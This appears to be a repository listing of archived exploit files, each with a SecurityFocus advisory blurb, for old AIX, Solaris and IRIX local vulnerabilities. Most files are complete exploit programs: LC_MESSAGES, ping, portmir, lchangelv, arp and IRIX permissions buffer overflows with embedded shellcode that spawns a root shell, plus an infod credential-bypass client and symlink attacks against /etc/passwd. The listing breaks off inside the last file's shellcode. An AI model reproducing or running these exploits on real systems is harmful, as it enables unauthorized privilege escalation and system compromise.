platforms/aix/local/19213.sh Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/268/info
A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges.
#!/bin/ksh
L=3000
STEP=34
MAX=16000
while [ $L -lt $MAX ]
do
./a.out $L
L=`expr $L + $STEP`
done

193
platforms/aix/local/19214.c Executable file
View file

@ -0,0 +1,193 @@
source: http://www.securityfocus.com/bid/268/info
A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges.
/*
AIX 4.2/4.1 LC_MESSEGAS /usr/sbin/mount exploit by Georgi Guninski
----------------------------------------
DISCLAIMER
This program is for educational purpose ONLY. Do not use it without
permission.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski
is not liable for any damages caused by direct or indirect use of
the information or functionality provided by this program.
Georgi Guninski, his employer or any Internet provider bears NO
responsibility for content
or misuse of this program or any derivatives thereof.
By using this program you accept the fact that any damage (dataloss,
system
crash, system compromise, etc.) caused by the use of this program is
not
Georgi Guninski's responsibility.
In case you distribute this, please keep the disclaimer and my
addresses.
-----------------------------------------
Use the IBM C compiler.
Compile with: cc -g test2.c
-----------------
Georgi Guninski
guninski@hotmail.com
sgg@vmei.acad.bg
guninski@linux2.vmei.acad.bg
http://www.geocities.com/ResearchTriangle/1711
Suggestions,comments and job offers are welcome!
22-Mar-97
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char prog[100]="/usr/sbin/mount";
char prog2[30]="mount";
extern int execv();
char *createvar(char *name,char *value)
{
char *c;
int l;
l=strlen(name)+strlen(value)+4;
if (! (c=malloc(l))) {perror("error allocating");exit(2);};
strcpy(c,name);
strcat(c,"=");
strcat(c,value);
putenv(c);
return c;
}
/*The program*/
main(int argc,char **argv,char **env)
{
/*The code*/
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
/* disassembly
7c0802a6 mfspr r0,LR
9421fbb0 stu SP,-1104(SP) --get stack
90010458 st r0,1112(SP)
3c60f019 cau r3,r0,0xf019 --CTR
60632c48 lis r3,r3,11336 --CTR
90610440 st r3,1088(SP)
3c60d002 cau r3,r0,0xd002 --TOC
60634c0c lis r3,r3,19468 --TOC
90610444 st r3,1092(SP)
3c602f62 cau r3,r0,0x2f62 --'/bin/sh\x01'
6063696e lis r3,r3,26990
90610438 st r3,1080(SP)
3c602f73 cau r3,r0,0x2f73
60636801 lis r3,r3,26625
3863ffff addi r3,r3,-1
9061043c st r3,1084(SP) --terminate with 0
30610438 lis r3,SP,1080
7c842278 xor r4,r4,r4 --argv=NULL
80410440 lwz RTOC,1088(SP)
80010444 lwz r0,1092(SP) --jump
7c0903a6 mtspr CTR,r0
4e800420 bctr --jump
*/
#define MAXBUF 600
unsigned int buf[MAXBUF];
unsigned int frame[MAXBUF];
unsigned int i,nop,mn;
int max;
int QUIET=0;
int dobuf=0;
char VAR[30]="LC_MESSAGES";
unsigned int toc;
unsigned int eco;
unsigned int *pt;
char *t;
int egg=1;
int ch;
unsigned int reta; /* return address */
int corr=4604;
char *args[4];
char *newenv[8];
int justframes=1;
int startwith=0;
mn=78;
max=100;
if (argc>1)
corr = atoi(argv[1]);
pt=(unsigned *) &execv;
toc=*(pt+1);
eco=*pt;
if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) )
{
perror("Bad parameters");
exit(1);
}
#define OO 7
*((unsigned short *)code + OO + 2)=(unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code + OO)=(unsigned short) ((toc >> 16) &
0x0000ffff);
*((unsigned short *)code + OO + 8 )=(unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code + OO + 6 )=(unsigned short) ((eco >> 16) &
0x0000ffff);
reta=startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0]+corr;
for(nop=0;nop<mn;nop++)
buf[nop]=startwith ? reta : 0x4ffffb82; /*NOP*/
strcpy((char*)&buf[nop],(char*)&code);
i=nop+strlen( (char*) &code)/4-1;
if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000)
|| !(reta && 0xff000000))
{
perror("Return address has zero");exit(5);
}
while(i++<max)
buf[i]=reta;
buf[i]=0;
for(i=0;i<max-1;i++)
frame[i]=reta;
frame[i]=0;
if(QUIET) {puts((char*)&buf);fflush(stdout);exit(0);};
puts("Start...");/*Here we go*/
newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
newenv[5]=VAR[0] ? createvar(VAR,justframes ? (char*)&frame :
(char*)&buf):NULL;
newenv[6]=NULL;
args[0]=prog2;
execve(prog,args,newenv);
perror("Error executing execve \n");
/* Georgi Guninski
guninski@hotmail.com
sgg@vmei.acad.bg
guninski@linux2.vmei.acad.bg
http://www.geocities.com/ResearchTriangle/1711
*/
}

83
platforms/aix/local/19215.c Executable file
View file

@ -0,0 +1,83 @@
source: http://www.securityfocus.com/bid/268/info
A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges.
/*============================================================
ex_lobc.c Overflow Exploits( for Sparc Edition)
The Shadow Penguin Security
(http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
offsets for 2.7/SPARC: 7144, 7152, 7160, 7168, and more...
offset for 2.6/SPARC: 5392
============================================================
*/
#define EV "LC_MESSAGES="
#define ADJUST 0
#define STARTADR 400
#define NOP 0xa61cc013
#define RETS 600
char x[80000];
char exploit_code[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2b\x0b\xda\xdc\xae\x15\x63\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
"\x94\x10\x20\x10\x94\x22\xa0\x10"
"\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;
unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
int i;
unsigned int ret_adr;
main(int argc, char *argv[])
{
int OFFSET;
putenv("LANG=");
memset(x,'x',70000);
if (argc == 2)
OFFSET = atoi(argv[1]);
else
OFFSET = 5392; // default offset for 2.6
for (i = 0; i < ADJUST; i++) x[i]=0x40;
for (i = ADJUST; i < 1000; i+=4){
x[i+3]=NOP & 0xff;
x[i+2]=(NOP >> 8 ) &0xff;
x[i+1]=(NOP >> 16 ) &0xff;
x[i+0]=(NOP >> 24 ) &0xff;
}
for (i=0;i<strlen(exploit_code);i++) \
x[STARTADR+i+ADJUST]=exploit_code[i];
ret_adr=get_sp()-OFFSET;
printf("jumping address : %lx, offset = %d\n",ret_adr, OFFSET);
if ((ret_adr & 0xff) ==0 ){
ret_adr -=16;
printf("New jumping address : %lx\n",ret_adr);
}
for (i = ADJUST+RETS; i < RETS+600; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >> 8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
memcpy(x,EV,strlen(EV));
x[3000]=0;
putenv(x);
execl("/bin/rsh","su",(char *)0);
}

61
platforms/aix/local/19216.c Executable file
View file

@ -0,0 +1,61 @@
source: http://www.securityfocus.com/bid/268/info
A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges.
#include <fcntl.h>
/* arpexp.c
arp overflow proof of concept by ahmed@securityfocus.com
shellcode originally written by Cheez Whiz.
tested on x86 solaris 7,8beta
default should work. if not, arg1 = offset. +- by 100's
Except for shellcode, copyright Security-Focus.com, 11/2000
*/
long get_esp() { __asm__("movl %esp,%eax"); }
int main(int ac, char **av)
{
char shell[] = "\xeb\x45\x9a\xff\xff\xff\xff\x07\xff"
"\xc3\x5e\x31\xc0\x89\x46\xb7\x88\x46"
"\xbc\x88\x46\x07\x89\x46\x0c\x31\xc0"
"\xb0\x2f\xe8\xe0\xff\xff\xff\x52\x52"
"\x31\xc0\xb0\xcb\xe8\xd5\xff\xff\xff"
"\x83\xc4\x08\x31\xc0\x50\x8d\x5e\x08"
"\x53\x8d\x1e\x89\x5e\x08\x53\xb0\x3b"
"\xe8\xbe\xff\xff\xff\x83\xc4\x0c\xe8"
"\xbe\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x73\x68\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff";
unsigned long magic = 0x8047b78;
unsigned long r = get_esp() + 600;
unsigned char buf[300];
int f;
if (ac == 2)
r += atoi(av[1]);
memset(buf,0x61,sizeof(buf));
memcpy(buf+52,&magic,4);
memcpy(buf+76,&r,4);
f = open("/tmp/ypx",O_CREAT|O_WRONLY,0600);
write(f,"1 2 3 4 ",8);
write(f,buf,sizeof(buf));
close(f);
memset(buf,0x90,sizeof(buf));
memcpy(buf,"LOL=",4);
memcpy(buf+(sizeof(buf)-strlen(shell)),shell,strlen(shell));
putenv(buf);
system("/usr/sbin/arp -f /tmp/ypx");
unlink("/tmp/ypx");
}

70
platforms/aix/local/19217.c Executable file
View file

@ -0,0 +1,70 @@
source: http://www.securityfocus.com/bid/268/info
A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges.
/*============================================================
ex_lobc.c Overflow Exploits( for Sparc Edition)
The Shadow Penguin Security
(http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
============================================================
*/
#define EV "LC_MESSAGES="
#define ADJUST 0
#define OFFSET 5392
#define STARTADR 400
#define NOP 0xa61cc013
#define RETS 600
char x[80000];
char exploit_code[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2b\x0b\xda\xdc\xae\x15\x63\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
"\x94\x10\x20\x10\x94\x22\xa0\x10"
"\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;
unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
int i;
unsigned int ret_adr;
main()
{
putenv("LANG=");
memset(x,'x',70000);
for (i = 0; i < ADJUST; i++) x[i]=0x40;
for (i = ADJUST; i < 1000; i+=4){
x[i+3]=NOP & 0xff;
x[i+2]=(NOP >> 8 ) &0xff;
x[i+1]=(NOP >> 16 ) &0xff;
x[i+0]=(NOP >> 24 ) &0xff;
}
for (i=0;i<strlen(exploit_code);i++) x[STARTADR+i+ADJUST]=exploit_code[i];
ret_adr=get_sp()-OFFSET;
printf("jumping address : %lx\n",ret_adr);
if ((ret_adr & 0xff) ==0 ){
ret_adr -=16;
printf("New jumping address : %lx\n",ret_adr);
}
for (i = ADJUST+RETS; i < RETS+600; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >> 8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
memcpy(x,EV,strlen(EV));
x[3000]=0;
putenv(x);
execl("/bin/passwd","passwd",(char *)0);
}

14
platforms/aix/local/19229 Executable file
View file

@ -0,0 +1,14 @@
soure: http://www.securityfocus.com/bid/287/info
IBM's eNetwork Firewall for AIX contains a number of vulnerability in scripts which manipulate files insecurely. When fwlsuser script is run it creates a temporary file called /tmp/fwlsuser.PID ( where PID is the process ID of the command being run ). If this file is created previously and is a link to any other file the output generated by the fwlsuser script will overwrite this linked file.
x = 5000
while true
LOCAL FIX AS REPORTED BY ORIGINATOR:
ln -s /etc/passwd /tmp/fwlsuser.$x
# rm /tmp/fwlsuser.$x
let x=$x+1
echo $x
done
exit

226
platforms/aix/local/19287.c Executable file
View file

@ -0,0 +1,226 @@
source: http://www.securityfocus.com/bid/370/info
Certain versions of AIX ship with an Information Daemon, infod. This program is designed to provide information about the OS and installed ancilliary programs. The daemon which runs as root, does not check credentials which are passed to it. This allows users to pass requests with arbitrary UID's. If a user passes infod a request as root, they can goto the default options menu and change the printer command line to an alternate binary such as /bin/sh that gives privileges to the account the session was spawned under.
/* Infod AIX exploit (k) Arisme 21/11/98 - All Rights Reversed
Based on RSI.0011.11-09-98.AIX.INFOD (http://www.repsec.com)
Run program with the login you want to exploit :)
When the window appears, select "options", "defaults", change printer
to something more useful (like /bin/x11/xterm) and print !
Comments,questions : arisme@altern.org */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <pwd.h>
#define TAILLE_BUFFER 2000
#define SOCK_PATH "/tmp/.info-help"
#define PWD "/tmp"
#define KOPY "Infod AIX exploit (k) Arisme 21/11/98\nAdvisory RSI.0011.11-0
9-98.AIX.INFOD (http://www.repsec.com)"
#define NOUSER "Use : infofun [login]"
#define UNKNOWN "User does not exist !"
#define OK "Waiting for magic window ... if you have problems check the xho
st "
void send_environ(char *var,FILE *param)
{ char tempo[TAILLE_BUFFER];
int taille;
taille=strlen(var);
sprintf(tempo,"%c%s%c%c%c",taille,var,0,0,0);
fwrite(tempo,1,taille+4,param);
}
main(int argc,char** argv)
{ struct sockaddr_un sin,expediteur;
struct hostent *hp;
struct passwd *info;
int chaussette,taille_expediteur,port,taille_struct,taille_param;
char buffer[TAILLE_BUFFER],paramz[TAILLE_BUFFER],*disp,*pointeur;
FILE *param;
char *HOME,*LOGIN;
int UID,GID;
printf("\n\n%s\n\n",KOPY);
if (argc!=2) { printf("%s\n",NOUSER);
exit(1); }
info=getpwnam(argv[1]);
if (!info) { printf("%s\n",UNKNOWN);
exit(1); }
HOME=info->pw_dir;
LOGIN=info->pw_name;
UID=info->pw_uid;
GID=info->pw_gid;
param=fopen("/tmp/tempo.fun","wb");
chaussette=socket(AF_UNIX,SOCK_STREAM,0);
sin.sun_family=AF_UNIX;
strcpy(sin.sun_path,SOCK_PATH);
taille_struct=sizeof(struct sockaddr_un);
if (connect(chaussette,(struct sockaddr*)&sin,taille_struct)<0)
{ perror("connect");
exit(1); }
/* 0 0 PF_UID pf_UID 0 0 */
sprintf(buffer,"%c%c%c%c%c%c",0,0,UID>>8,UID-((UID>>8)*256),0,0);
fwrite(buffer,1,6,param);
/* PF_GID pf_GID */
sprintf(buffer,"%c%c",GID>>8,GID-((GID>>8)*256));
fwrite(buffer,1,2,param);
/* DISPLAY (259) */
bzero(buffer,TAILLE_BUFFER);
strcpy(buffer,getenv("DISPLAY"));
fwrite(buffer,1,259,param);
/* LANG (1 C 0 0 0 0 0 0 0) */
sprintf(buffer,"%c%c%c%c%c%c%c%c%c",1,67,0,0,0,0,0,0,0);
fwrite(buffer,1,9,param);
/* size_$HOME $HOME 0 0 0 */
send_environ(HOME,param);
/* size_$LOGNAME $LOGNAME 0 0 0 */
send_environ(LOGIN,param);
/* size_$USERNAME $USERNAME 0 0 0 */
send_environ(LOGIN,param);
/* size_$PWD $PWD 0 0 0 */
send_environ(PWD,param);
/* size_DISPLAY DISPLAY 0 0 0 */
//send_environ(ptsname(0),param);
/* If we send our pts, info_gr will crash as it has already changed UID *
/
send_environ("/dev/null",param);
/* It's probably not useful to copy all these environment vars but it was
good for debugging :) */
sprintf(buffer,"%c%c%c%c",23,0,0,0);
fwrite(buffer,1,4,param);
sprintf(buffer,"_=./startinfo");
send_environ(buffer,param);
sprintf(buffer,"TMPDIR=/tmp");
send_environ(buffer,param);
sprintf(buffer,"LANG=%s",getenv("LANG"));
send_environ(buffer,param);
sprintf(buffer,"LOGIN=%s",LOGIN);
send_environ(buffer,param);
sprintf(buffer,"NLSPATH=%s",getenv("NLSPATH"));
send_environ(buffer,param);
sprintf(buffer,"PATH=%s",getenv("PATH"));
send_environ(buffer,param);
sprintf(buffer,"%s","EDITOR=emacs");
send_environ(buffer,param);
sprintf(buffer,"LOGNAME=%s",LOGIN);
send_environ(buffer,param);
sprintf(buffer,"MAIL=/usr/spool/mail/%s",LOGIN);
send_environ(buffer,param);
sprintf(buffer,"HOSTNAME=%s",getenv("HOSTNAME"));
send_environ(buffer,param);
sprintf(buffer,"LOCPATH=%s",getenv("LOCPATH"));
send_environ(buffer,param);
sprintf(buffer,"%s","PS1=(exploited !) ");
send_environ(buffer,param);
sprintf(buffer,"USER=%s",LOGIN);
send_environ(buffer,param);
sprintf(buffer,"AUTHSTATE=%s",getenv("AUTHSTATE"));
send_environ(buffer,param);
sprintf(buffer,"DISPLAY=%s",getenv("DISPLAY"));
send_environ(buffer,param);
sprintf(buffer,"SHELL=%s",getenv("SHELL"));
send_environ(buffer,param);
sprintf(buffer,"%s","ODMDIR=/etc/objrepos");
send_environ(buffer,param);
sprintf(buffer,"HOME=%s",HOME);
send_environ(buffer,param);
sprintf(buffer,"%s","TERM=vt220");
send_environ(buffer,param);
sprintf(buffer,"%s","MAILMSG=[YOU HAVE NEW MAIL]");
send_environ(buffer,param);
sprintf(buffer,"PWD=%s",PWD);
send_environ(buffer,param);
sprintf(buffer,"%s","TZ=NFT-1");
send_environ(buffer,param);
sprintf(buffer,"%s","A__z=! LOGNAME");
send_environ(buffer,param);
/* Start info_gr with -q parameter or the process will be run locally and
not from the daemon ... */
sprintf(buffer,"%c%c%c%c",1,45,113,0);
fwrite(buffer,1,4,param);
fclose(param);
param=fopen("/tmp/tempo.fun","rb");
fseek(param,0,SEEK_END);
taille_param=ftell(param);
fseek(param,0,SEEK_SET);
fread(paramz,1,taille_param,param);
fclose(param);
unlink("/tmp/tempo.fun");
/* Thank you Mr daemon :) */
write(chaussette,paramz,taille_param);
printf("\n%s %s\n",OK,getenv("HOSTNAME"));
close(chaussette);
}

5
platforms/aix/local/19300 Executable file
View file

@ -0,0 +1,5 @@
source: http://www.securityfocus.com/bid/375/info
The snap command is a diagnostic utlitiy for gathering system information on AIX platforms. It can only be executed by root, but it copies various system files into /tmp/ibmsupt/ under /tmp/ibmsupt/general/ you will find the passwd file with cyphertext. The danger here is if a system administrator executes snap -a as sometimes requested by IBM support while diagnosing a problem it defeats password shadowing. /tmp/ibmsupt is created with 755 permissions they may carry out a symlink attack and gain access to the password file.
snap is a shell script which uses cp -p to gather system information. Data from /etc/security is gathered between lines 721 - 727. Seeing that snap uses the /tmp/ibmsupt/general directory someone may create the directory as a normal user (tested on on AIX 4.2.1). The user may then do a touch on /tmp/ibmsupt/general/passwd. Once the passwd file is created do tail -f /tmp/ibmsupt/general/passwd. If in another session someone loggs in as root and ran snap -a - this will cause the contents of the /etc/security/passwd to show up in tail command.

71
platforms/aix/local/19306.c Executable file
View file

@ -0,0 +1,71 @@
source: http://www.securityfocus.com/bid/385/info
AIX version 4.2.1 introduced a new command titled 'portmir'. This new program had two notable vulnerabilites. First it contained a buffer overflow which allowed malicious users to obtain root privileges. Secondly it wrote it's log files to a world readable directly thereby exposing security relavent information.
/*## copyright LAST STAGE OF DELIRIUM oct 2000 poland *://lsd-pl.net/ #*/
/*## /usr/bin/portmir #*/
/* note: to avoid potential system hang-up please, first obtain the exact */
/* AIX OS level with the use of the uname -a or oslevel commands */
#define ADRNUM 400
#define NOPNUM 16000
#define ALLIGN 2
char shellcode[]=
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"/bin/sh\xff"
;
char nop[]="\x7f\xff\xfb\x78";
main(int argc,char **argv,char **e){
char buffer[20000],adr[4],*b,*envp[2];
int i;
printf("copyright LAST STAGE OF DELIRIUM oct 2000 poland //lsd-pl.net/\n");
printf("/usr/sbin/portmir for aix 4.2 4.3 4.3.x PowerPC/POWER\n\n");
if(argc<2){
printf("usage: %s 42|43|433\n",argv[0]);exit(-1);
}
switch(atoi(argv[1])){
case 42: shellcode[55]=0x02; break;
case 43: shellcode[55]=0x04; break;
case 433: shellcode[55]=0x03; break;
default: exit(-1);
}
i=0; while(*e++) i+=strlen(*e)+1;
*((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000;
envp[0]=&buffer[1000];
envp[1]=0;
b=buffer;
for(i=0;i<ALLIGN;i++) *b++=adr[i%4];
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
*b=0;
b=&buffer[1000];
sprintf(b,"xxx=");b+=4;
for(i=0;i<ALLIGN;i++) *b++=' ';
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
*b=0;
execle("/usr/sbin/portmir","lsd","-t",buffer,0,envp);
}

104
platforms/aix/local/19307.c Executable file
View file

@ -0,0 +1,104 @@
source: http://www.securityfocus.com/bid/387/info
A buffer overflow condition exists in some versions of /usr/sbin/ping under AIX. Given that ping is SUID root, this overflow allows malicious users to gain root from it.
/*
*
* /usr/sbin/ping exploit (kinda' coded) by BeastMaster V
*
* CREDITS: this is simpy a modified version of an exploit
* posted by Georgi Guninski (guninski@hotmail.com)
*
* This will give a #rootshell# by overwriting a buffer
* in /usr/sbin/ping while ping is setuid to root.
* This exploit is designed for AIX 4.x on PPC platform.
*
*
* USAGE:
* $ cc -o foo -g aix_ping.c
* $ ./foo 5100
* #
*
*
* HINT: Try giving ranges from 5090 through 5500
*
* DISCLAIMER: use this program in a responsible manner.
*
* --> don't forget to visit http://www.rootshell.com
* --> for more goodies :-)
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
extern int execv();
#define MAXBUF 600
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
char *createvar(char *name,char *value)
{
char *c;
int l;
l=strlen(name)+strlen(value)+4;
if (! (c=malloc(l))) {perror("error allocating");exit(2);};
strcpy(c,name);
strcat(c,"=");
strcat(c,value);
putenv(c);
return c;
}
main(int argc,char **argv,char **env)
{
unsigned int buf[MAXBUF],frame[MAXBUF],i,nop,toc,eco,*pt;
int min=100, max=280;
unsigned int return_address;
char *newenv[8];
char *args[4];
int offset=5300;
if (argc==2) offset = atoi(argv[1]);
pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt;
*((unsigned short *)code+9)=(unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code+7)=(unsigned short) ((toc >> 16) & 0x0000ffff)
;
*((unsigned short *)code+15)=(unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code+13)=(unsigned short) ((eco >> 16) & 0x0000ffff
);
return_address=(unsigned)&buf[0]+offset;
for(nop=0;nop<min;nop++) buf[nop]=0x4ffffb82;
strcpy((char*)&buf[nop],(char*)&code);
i=nop+strlen( (char*) &code)/4-1;
for(i=0;i<max-1;i++) frame[i]=return_address;
frame[i]=0;
newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
newenv[5]=NULL;
args[0]="ping";
args[1]=(char*)&frame[0];
execve("/usr/sbin/ping",args,newenv);
perror("Error executing execve \n");
}

103
platforms/aix/local/19309.c Executable file
View file

@ -0,0 +1,103 @@
source: http://www.securityfocus.com/bid/389/info
A buffer overflow can occur in lchangelv under some versions of AIX. Note that an attacker must already have the GID or EGID of 'system' to execute lchangelv.
Because lchangelv is SUID root, this overflow will grant the attacker root privileges.
/*
*
* /usr/sbin/lchangelv (kinda' coded) by BeastMaster V
*
* CREDITS: this is simply a modified version of an exploit
* posted by Georgi Guninski (guninski@hotmail.com)
*
* NOTES: you must have gid or egid of (system) to run this.
*
* USAGE:
* $ cc -o foo -g aix_lchangelv.c
* $ ./foo 5100
* #
*
*
* HINT: Try giving ranges from 5090 through 5500
*
* DISCLAIMER: use this program in a responsible manner.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
extern int execv();
#define MAXBUF 600
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
char *createvar(char *name,char *value)
{
char *c;
int l;
l=strlen(name)+strlen(value)+4;
if (! (c=malloc(l))) {perror("error allocating");exit(2);};
strcpy(c,name);
strcat(c,"=");
strcat(c,value);
putenv(c);
return c;
}
main(int argc,char **argv,char **env)
{
unsigned int buf[MAXBUF],frame[MAXBUF],i,nop,toc,eco,*pt;
int min=100, max=280;
unsigned int return_address;
char *newenv[8];
char *args[4];
int offset=3200;
if (argc==2) offset = atoi(argv[1]);
pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt;
*((unsigned short *)code+9)=(unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code+7)=(unsigned short) ((toc >> 16) & 0x0000f
fff);
*((unsigned short *)code+15)=(unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code+13)=(unsigned short) ((eco >> 16) & 0x0000
ffff);
return_address=(unsigned)&buf[0]+offset;
for(nop=0;nop<min;nop++) buf[nop]=0x4ffffb82;
strcpy((char*)&buf[nop],(char*)&code);
i=nop+strlen( (char*) &code)/4-1;
for(i=0;i<max-1;i++) frame[i]=return_address;
frame[i]=0;
newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
newenv[5]=NULL;
args[0]="lchangelv";
args[1]="-l";
args[2]=(char*)&frame[0];
execve("/usr/sbin/lchangelv",args,newenv);
perror("Error executing execve \n");
}

113
platforms/aix/local/19318.c Executable file
View file

@ -0,0 +1,113 @@
source: http://www.securityfocus.com/bid/417/info
A buffer overrun exists in the permissions program, as shipped by Silicon Graphics with the 5.x and 6.x Irix operating system. By supplying a long, well crafted buffer as the 4th argument to the program, arbitrary code can be executed as group sys.
/* /usr/lib/desktop/permissions exploit by DCRH 26/5/97
*
* This gives you egid = sys
*
* Tested on: R8000 Power Challenge (Irix64 6.2)
*
* Exploit doesn't work on Irix 5.x due to stack position
*
* compile as: cc -n32 perm.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
#define NUM_ADDRESSES 400
#define BUF_LENGTH 700
#define EXTRA 500
#define OFFSET 0x200
#define GP_OFFSET 31612
#define IRIX_NOP 0x03e0f825 /* move $ra,$ra */
#define u_long unsigned
u_long get_sp_code[] = {
0x03a01025, /* move $v0,$sp */
0x03e00008, /* jr $ra */
0x00000000, /* nop */
};
u_long irix_shellcode[] = {
0x24041234, /* li $4,0x1234 */
0x2084edcc, /* sub $4,0x1234 */
0x0491fffe, /* bgezal $4,pc-4 */
0x03bd302a, /* sgt $6,$sp,$sp */
0x23e4012c, /* addi $4,$31,264+36 */
0xa086feff, /* sb $6,-264+7($4) */
0x2084fef8, /* sub $4,264 */
0x20850110, /* addi $5,$4,264+8 */
0xaca4fef8, /* sw $4,-264($5) */
0xaca6fefc, /* sw $4,-260($5) */
0x20a5fef8, /* sub $5, 264 */
0x240203f3, /* li $v0,1011 */
0x03ffffcc, /* syscall 0xfffff */
0x2f62696e, /* "/bin" */
